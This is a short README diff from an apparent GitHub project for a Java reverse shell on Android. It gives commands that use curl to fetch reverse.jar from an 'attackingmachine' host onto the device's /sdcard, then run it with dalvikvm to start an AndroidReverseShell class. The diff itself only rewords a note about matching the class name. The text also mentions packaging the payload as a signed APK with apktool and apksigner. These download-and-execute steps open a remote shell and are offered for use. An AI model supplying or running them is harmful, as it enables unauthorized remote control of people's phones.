CalfCrusher/JavaAndroidReverseShell/README.md

 `curl http://attackingmachine:9999/reverse.jar -o /sdcard/reverse.jar`<br/>
 `cd /system/bin/ && ./dalvikvm -cp /sdcard/reverse.jar AndroidReverseShell`

-(pay attention to final "AndroidReverseShell" this must be same name used before, otherwise it fails!)
+("AndroidReverseShell" this class name must be the same used before, otherwise it fails!)

 You can of course create a pure .apk package and sign it using Android Studio or apktool and apksigner.